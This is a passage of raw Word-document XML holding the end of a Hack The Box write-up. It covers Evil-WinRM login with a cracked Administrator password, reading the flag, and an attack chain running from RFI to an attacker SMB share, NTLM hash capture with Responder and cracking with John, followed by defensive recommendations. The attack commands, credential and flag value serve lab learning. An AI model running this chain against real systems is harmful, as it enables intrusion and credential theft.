        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.8 WinRM Access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With the Administrator password recovered, I connected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to the target machine using Evil-WinRM over port 5985.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Command used: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>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>evil-winrm -i 10.129.113.211 -u Administrator -p badminton</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="FFFFD7" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="FFFFD7" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="FFFFD7" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="FFFFD7" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="FFFFD7" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="FFFFD7" w:val="clear"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="17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332220" cy="1814195"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="23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220" cy="18141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star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6332220" cy="1591310"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="24" name="Image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Image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32220" cy="15913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 WinRM connection established as Administrator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98.6pt;height:142.8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star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6332220" cy="1591310"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="25" name="Image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Image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32220" cy="1591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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>8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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: WinRM connection established as Administrator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3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.9 Flag Retrieval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 navigated to Mike's desktop and retrieved the flag.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Commands used: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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>cd C:\Users\mike\Desktop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>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>type flag.txt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Flag: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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>ea81b7afddd03efaa0945333ed147fac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="19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332220" cy="3009900"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="26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220" cy="30099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star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6332220" cy="2787015"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="27" name="Image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Image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32220" cy="27870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9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 09-flag-retrieved.png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98.6pt;height:237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star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6332220" cy="2787015"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="28" name="Image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" name="Image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32220" cy="27870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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>9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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: 09-flag-retrieved.png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2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4. ATTACK CHAIN SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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The complete attack chain from initial connection to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flag retrieval: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HTB VPN (10.10.14.61)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↓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Target (10.129.106.23)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↓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RFI Vulnerability (//10.10.14.179/test.txt)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↓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SMB Connection to Attacker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↓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NTLM Hash Captured by Responder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↓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Hash Cracked with John (badminton)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↓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WinRM Access as Administrator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↓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Flag: ea81b7afddd03efaa0945333ed147fac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2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5. KEY TAKEAWAYS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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RFI vulnerabilities are dangerous. They can force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servers to authenticate to attacker-controlled resources,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leaking credentials without any user interaction.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NTLM hashes can be captured and cracked offline. Once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a hash is captured, an attacker has unlimited time to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crack it without touching the target again.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Weak passwords are easily compromised. "badminton" was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cracked in under a second using a standard wordlist.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WinRM provides remote access when credentials are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obtained. Port 5985 is often overlooked during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enumeration but offers full command execution.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Defense in depth is essential. Multiple layers failed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here: RFI vulnerability, NTLM enabled, weak password,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and WinRM exposed.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  <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>6. DEFENSIVE RECOMMENDATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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Disable NTLM authentication where possible. Migrate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to Kerberos or modern authentication methods.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Enforce strong password policies. Minimum 15 characters,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complexity requirements, and regular rotation.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Patch RFI vulnerabilities in web applications. Never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allow user input to control file inclusion paths.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Disable WinRM if not needed. If required, restrict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access to trusted management networks only.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Implement network segmentation. Isolate critical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systems to limit lateral movement.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Monitor for Responder/LLMNR/NBT-NS poisoning. Use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network detection tools to identify poisoning attempts.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Enable SMB signing. This prevents relay attacks even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if hashes are captured.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7. DISCLAIMER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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This walkthrough is for EDUCATIONAL PURPOSES ONLY.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All testing was performed on Hack The Box, a legal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penetration testing platform designed for learning.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Never test systems without explicit written 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authorization from the system owner.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Unauthorized access to computer systems is illegal </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="140"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and carries severe penalties.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Monospace">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="auto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igure">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="Caption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9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84</TotalTime>
  <Application>LibreOffice/26.2.5.2$Linux_X86_64 LibreOffice_project/620$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>17</Pages>
  <Words>1084</Words>
  <Characters>6389</Characters>
  <CharactersWithSpaces>7854</CharactersWithSpaces>
  <Paragraphs>186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2026-10-05T16:30:56Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-07T12:45:42Z</dcterms:modified>
  <cp:revision>18</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>